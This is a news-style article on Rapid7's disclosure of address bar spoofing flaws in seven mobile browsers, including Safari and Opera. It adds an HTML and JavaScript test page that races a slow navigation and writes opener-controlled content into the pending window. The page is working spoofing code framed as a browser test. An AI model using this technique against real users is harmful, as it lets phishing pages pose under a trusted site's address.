Safari Among Seven Mobile Browsers Affected by Address Bar Spoofing Vulnerabilities


Researchers at the cyber-security firm Rapid7 have reported that several popular mobile browsers are susceptible to ten new ‘address bar spoofing’ vulnerabilities, putting the privacy and digital security of their users at risk. According to the report, the affected browsers are Safari, Opera Touch, Opera Mini, Bolt Browser, RITS Browser, UC Browser and Yandex Browser.

The issues were discovered earlier this year by Rapid7 researchers in association with Pakistani cyber-security analyst Rafay Baloch, and were reported to the respective developers in August. While Apple has since released a fix for Safari, Opera says it will roll out a patch on Veterans’ Day. The remaining developers are said to have either ignored the warnings or failed to follow up after an initial response.

Source: Seven mobile browsers vulnerable to address bar spoofing attacks | ZDNet

While address bar spoofing has existed since the early days of the world wide web, most desktop browsers have added several layers of protection over the years to prevent websites from hiding their true identity from visitors. However, because of the limited screen space on mobile devices, some of the checks and visual cues that desktop browsers use against spoofing cannot be easily accommodated in a mobile browser, leaving mobile users more exposed to such attacks.

Explaining how address bar spoofing works, the researchers said that “Exploitation all comes down to ‘Javascript shenanigans’”. According to Rapid7’s Research Director, Tod Beardsley, “By messing with the timing between page loads and when the browser gets a chance to refresh the address bar, an attacker can cause either a pop-up to appear to come from an arbitrary website or can render content in the browser window that falsely appears to come from an arbitrary website”. In practice, the address bar can end up showing the URL of a navigation that has started but not yet finished loading, while the content still visible on screen belongs to the attacker’s page.
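To see the timing race Beardsley describes, the following test page reproduces the general pattern: a window is opened towards a URL that is slow to answer, and the opener keeps writing its own content into that window before the navigation commits. This is an added example written for this article, not the researchers’ proof of concept and not tied to any particular browser or CVE; the target URL, its port, and the hosting setup are assumptions and must be replaced with a host you control. The expected behaviour of a correctly built browser is that the new window’s address bar does not yet show the target URL (or the injected content is cleared) until the target has actually responded; a browser that displays the target URL above the opener-controlled text is exhibiting the spoof.

```html
<!doctype html>
<meta charset="utf-8">
<title>Address bar spoofing test page (added example)</title>
<!--
  Generic test page for the load-timing race described in the article.
  Added example; not the researchers' PoC and not specific to any CVE.
  Assumptions (not from the article):
   - TARGET points at a host/port that accepts or drops the TCP connection
     slowly, so the navigation stays pending for a few seconds.
   - The page is served from a host you control and triggered by a click,
     so the popup blocker allows window.open().
-->
<button id="go">Open test window</button>
<pre id="log"></pre>
<script>
  // The URL the opener wants the new window's address bar to display.
  const TARGET = 'https://example.com:8080/';   // assumed slow/unreachable port
  const log = (msg) => { document.getElementById('log').textContent += msg + '\n'; };

  document.getElementById('go').addEventListener('click', () => {
    // 1. Start a navigation in a new window. A vulnerable browser updates
    //    the address bar to TARGET as soon as the navigation *starts*.
    const w = window.open(TARGET, '_blank');
    if (!w) { log('popup blocked'); return; }

    // 2. Until that navigation commits, the new window still holds its
    //    initial about:blank document, which is same-origin with the opener
    //    and therefore scriptable. Keep writing opener-controlled content
    //    into it; the retry loop absorbs timing differences between browsers.
    const timer = setInterval(() => {
      try {
        w.document.body.innerHTML =
          '<h1 style="color:#b00">Opener-controlled content</h1>' +
          '<p>Check the address bar of THIS window. If it shows ' + TARGET +
          ' while this text is visible, the address bar is spoofable.</p>';
      } catch (e) {
        // A SecurityError here means the navigation committed and the
        // document is now cross-origin: the window is out of reach.
        clearInterval(timer);
        log('navigation committed, access lost: ' + e.name);
      }
    }, 100);

    // Stop after a few seconds either way.
    setTimeout(() => clearInterval(timer), 5000);
  });
</script>
```

Run it from a web server rather than a file:// URL so that the opener has a real origin, and point TARGET only at infrastructure you are allowed to test. The page checks a single variant of the problem (a slow navigation in a new window); the pop-up variant from the quote works the same way, with the opener calling `alert()` on the pending window so that the dialog is labelled with the target URL. Whether the spoof appears depends on the browser and version, so a negative result on one device says nothing about another.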

You can learn more technical details about the findings on Baloch’s website or the Rapid7 blog.
